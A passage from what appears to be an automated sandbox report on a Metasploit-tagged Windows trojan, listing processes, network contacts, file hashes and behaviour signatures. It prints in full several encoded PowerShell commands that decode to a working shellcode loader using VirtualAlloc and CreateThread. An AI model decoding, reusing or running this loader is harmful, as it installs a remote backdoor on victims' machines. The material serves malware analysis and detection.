AA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABuAGYASQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG4AZgBJACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAzADEALAAwAHgAZABkACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgAZABhACwAMAB4AGQAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEANQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAMQAsADAAeABlADIALAAwAHgAYwA0ACwAMAB4ADIAMQAsADAAeAA2ADMALAAwAHgAYQA2ACwAMAB4ADIANgAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4AGMANwAsADAAeABhAGYALAAwAHgAMwBmACwAMAB4ADQANQAsADAAeABjADcALAAwAHgAYwBiACwAMAB4ADMANAAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADkAOAAsADAAeAAxADkALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgAOAA5ACwAMAB4ADgAOAAsADAAeABmADEALAAwAHgAZAA4ACwAMAB4AGIAZQAsADAAeAAzADkALAAwAHgAYgBmACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgAYgBhACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAOQAzACwAMAB4ADMAOAAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4ADcAMwAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGEAYgAsADAAeAA3ADIALAAwAHgANAA1ACwAMAB4ADUAZAAsADAAeAA0ADEALAAwAHgAMgA2ACwAMAB4ADEAZQAsADAAeAAyADkALAAwAHgAZgA3ACwAMAB4AGQANwAsADAAeAAyAGIALAAwAHgANgA3ACwAMAB4AGMAYgAsADAAeAA1AGMALAAwAHgANgA3ACwAMAB4ADYAOQAsADAAeAA0AGIALAAwAHgAOAAwACwAMAB4ADMAMAAsADAAeAA4ADgALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAZAAzACwAMAB4ADUAYwAsADAAeAA5ADkALAAwAHgAOQBmACwAMAB4ADYAZgAsADAAeABkADUALAAwAHgAOAAxACwAMAB4AGYAYwAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeAAzADYALAAwAHgAMgAwACwAMAB4ADIAZgAsADAAeABlAGIALAAwAHgAMAA2ACwAMAB4AGMAOQAsADAAeAA4ADMALAAwAHgAZAAyACwAMAB4AGEANgAsADAAeAAzADgALAAwAHgAZABhACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAYQAzACwAMAB4AGEAOQAsADAAeAA2AGQALAAwAHgANwAyACwAMAB4ADUAZQAsADAAeABhADkALAAwAHgAYQA5ACwAMAB4ADAAOAAsADAAeAA4ADQALAAwAHgAMwBjACwAMAB4ADIAYQAsADAAeABhAGEALAAwAHgANABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANABhACwAMAB4ADgAMwAsADAAeAA3ADAALAAwAHgANQBjACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAZgA3ACwAMAB4ADMAYQAsADAAeAA0ADUALAAwAHgANgBmACwAMAB4AGQANAAsADAAeAAzADAALAAwAHgANwAxACwAMAB4AGUANAAsADAAeABkAGIALAAwAHgAOQA2ACwAMAB4AGYAMwAsADAAeABiAGUALAAwAHgAZgBmACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANgA0ACwAMAB4ADkAZQAsADAAeAA2ADMALAAwAHgAMAA1ACwAMAB4AGMAYgAsADAAeAA5AGYALAAwAHgANwA0ACwAMAB4AGUANgAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4AGYAZQAsADAAeAAwAGIALAAwAHgAYQAwACwAMAB4ADMANAAsADAAeAA1AGQALAAwAHgANAA0ACwAMAB4ADAANQAsADAAeAA3ADQALAAwAHgANQBlACwAMAB4ADkANAAsADAAeAAwADEALAAwAHgAMABmACwAMAB4ADIAZAAsADAAeABhADYALAAwAHgAOABlACwAMAB4AGIAYgAsADAAeABiADkALAAwAHgAOABhACwAMAB4ADQANwAsADAAeAA2ADUALAAwAHgAMwBkACwAMAB4AGUAYwAsADAAeAA3AGQALAAwAHgAZAAxACwAMAB4AGQAMQAsADAAeAAxADMALAAwAHgANwBlACwAMAB4ADIAMQAsADAAeABmAGIALAAwAHgAZAA3ACwAMAB4ADIAYQAsADAAeAA3ADEALAAwAHgAOQAzACwAMAB4AGYAZQAsADAAeAA1ADIALAAwAHgAMQBhACwAMAB4ADYAMwAsADAAeABmAGUALAAwAHgAOAA2ACwAMAB4ADgAYwAsADAAeAAzADMALAAwAHgANQAwACwAMAB4ADcAOQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAAyADkALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeAA5AGUALAAwAHgAMQA2ACwAMAB4ADMANAAsADAAeAAxADEALAAwAHgANwA1ACwAMAB4ADMAZgAsADAAeAA1AGMALAAwAHgAZQA1ACwAMAB4ADcANgAsADAAeAA0ADAALAAwAHgAOQBjACwAMAB4ADgAZQAsADAAeAAxADMALAAwAHgAMwAzACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADkAZAAsADAAeAA3ADMALAAwAHgAYgAzACwAMAB4ADIAYwAsADAAeABlADIALAAwAHgAMQBiACwAMAB4AGUAMgAsADAAeAA4ADcALAAwAHgAZAA2ACwAMAB4ADUAYgAsADAAeAAwAGIALAAwAHgAMAAyACwAMAB4ADkAZAAsADAAeAAxAGIALAAwAHgAZQA4ACwAMAB4AGMANwAsADAAeABhADgALAAwAHgAYwBiACwAMAB4ADcAOAAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4AGUAYgAsADAAeAAyADgALAAwAHgAOQAzACwAMAB4ADQAYgAsADAAeAA4ADEALAAwAHgAZAA4ACwAMAB4AGYANQAsADAAeABjADQALAAwAHgAMwBkACwAMAB4ADQAMAAsADAAeAA1AGMALAAwAHgAOQBlACwAMAB4AGQAYwAsADAAeAA4AGQALAAwAHgANABhACwAMAB4AGQAYQAsADAAeABkAGUALAAwAHgAMAA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAMAA4ACwAMAB4ADQANAAsADAAeAAxAGYALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeABjADIALAAwAHgAMgAwACwAMAB4ADcAOQAsADAAeAAxADkALAAwAHgAZQBhACwAMAB4AGIANAAsADAAeAA4ADYALAAwAHgAOAA4ACwAMAB4AGIAZAAsADAAeAAyADAALAAwAHgAOAA1ACwAMAB4AGUAZAAsADAAeAA4ADkALAAwAHgAZQBlACwAMAB4ADcANgAsADAAeABkADgALAAwAHgAOAAyACwAMAB4ADIANwAsADAAeABlADMALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeAA0ADcALAAwAHgAZQAzACwAMAB4ADIAMwAsADAAeABmAGMALAAwAHgAMQAxACwAMAB4ADYAOQAsADAAeAAyADQALAAwAHgAOQA0ACwAMAB4AGMANQAsADAAeABjADkALAAwAHgANwA3ACwAMAB4ADgAMQAsADAAeAAwADkALAAwAHgAYwA0ACwAMAB4AGUAYgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYwBmACwAMAB4ADMANwAsADAAeAA4ADAALAAwAHgANgAzACwAMAB4ADMANgAsADAAeAA3AGYALAAwAHgAMABmACwAMAB4ADkAYgAsADAAeAAxAGQALAAwAHgAOAAxACwAMAB4ADcAMwAsADAAeAA0AGEALAAwAHgANQBiACwAMAB4AGYANwAsADAAeAA5AGQALAAwAHgANABlADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABGAGUAUwBOAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABGAGUAUwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABGAGUAUwBOACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414F.tmp" "c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 testme.com udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 72.15.174.6:80 tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/720-0-0x0000000000400000-0x0000000000476000-memory.dmp

memory/3644-1-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

memory/3644-2-0x0000000002ED0000-0x0000000002F06000-memory.dmp

memory/3644-4-0x0000000074E70000-0x0000000075620000-memory.dmp

memory/3644-3-0x0000000005B80000-0x00000000061A8000-memory.dmp

memory/3644-6-0x0000000005970000-0x00000000059D6000-memory.dmp

memory/3644-8-0x0000000074E70000-0x0000000075620000-memory.dmp

memory/3644-5-0x00000000056D0000-0x00000000056F2000-memory.dmp

memory/3644-7-0x0000000005AE0000-0x0000000005B46000-memory.dmp

memory/3644-9-0x00000000061B0000-0x0000000006504000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0rpvq3ti.e51.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3644-19-0x0000000006790000-0x00000000067AE000-memory.dmp

memory/3644-20-0x0000000006830000-0x000000000687C000-memory.dmp

memory/1988-21-0x0000000074E70000-0x0000000075620000-memory.dmp

memory/1988-22-0x0000000074E70000-0x0000000075620000-memory.dmp

memory/1988-32-0x0000000007900000-0x0000000007F7A000-memory.dmp

memory/1988-33-0x0000000006490000-0x00000000064AA000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline

MD5 9b594472d3edd2866e41a9409e174c28
SHA1 fb712249b60038b2d2b4c690acf70a7c78774281
SHA256 962cfab3660f467575af9bd80140232b991b0eb58f8c5ac5cc8e35229376f17c
SHA512 ef277ee443c64be051e9add3a2d2ec818b519223739fababc9806784fb05017e508f4eaf31bfb4bb618a22772048ea358d966302f6095972f3f3466d2901bbaa

\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.0.cs

MD5 7319070c34daa5f6f2ece2dfc07119ee
SHA1 f26a4a48518a5608e93c8b77368f588b0433973c
SHA256 b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA512 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP

MD5 7b179e0bbe6cdabcb8adb8846f7ab4e8
SHA1 d7e4dfdf2f378f889f652008abd204c81de3660b
SHA256 5b850be8355ad0509406ad1d3ced0173a62b7dd4c7004437669fd12f1ac3edec
SHA512 ac5143f24ddace9a581653e8ed80bda120f93544a822a16d3a3552e57f9c666c60075d76e4cbff8b4f10199f23375655fa8a5109565edf84a398d7383d310e35

C:\Users\Admin\AppData\Local\Temp\RES414F.tmp

MD5 32301361b323937c28a85c9e3626607b
SHA1 4476c5069156ae769ee91eef123c51204f20468c
SHA256 e3da5c07c50ac0166d7a7391687a256973c6c59e01a2dc147c376bcb3f383aa6
SHA512 5c7cd2b42fed276f134261677fdb3f733e6ae4e45bd9d10a974de93f90440fd75bd93c024e2fe2f4c2bef24f0c032deffb933d62855f9051ebd4d8651c4ef243

memory/5004-55-0x0000000006080000-0x0000000006088000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.dll

MD5 71bbf2f34607364c50420c9db477d25c
SHA1 78febc656937380b72684fa09f74d707d5a669eb
SHA256 d3dcc264749ebcef1489722ddd0a1f72547cde119d091b50c53eec33d8b4a9a5
SHA512 a5d8532c9a8bc43d3d2681e8a96dd67a277d62be5bf90cab9d135132eeccfda570634e803ca87a14fac959e22e1db9559b09841e27387cb72c9ffbc0df4ad139

memory/5004-57-0x0000000006CE0000-0x0000000006CE1000-memory.dmp

memory/3644-59-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

memory/3644-60-0x0000000074E70000-0x0000000075620000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

memory/1988-63-0x0000000074E70000-0x0000000075620000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-22 21:48

Reported

2024-06-22 21:50

Platform

win7-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1708 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 2732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 2732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 2732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2732 wrote to memory of 2660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMA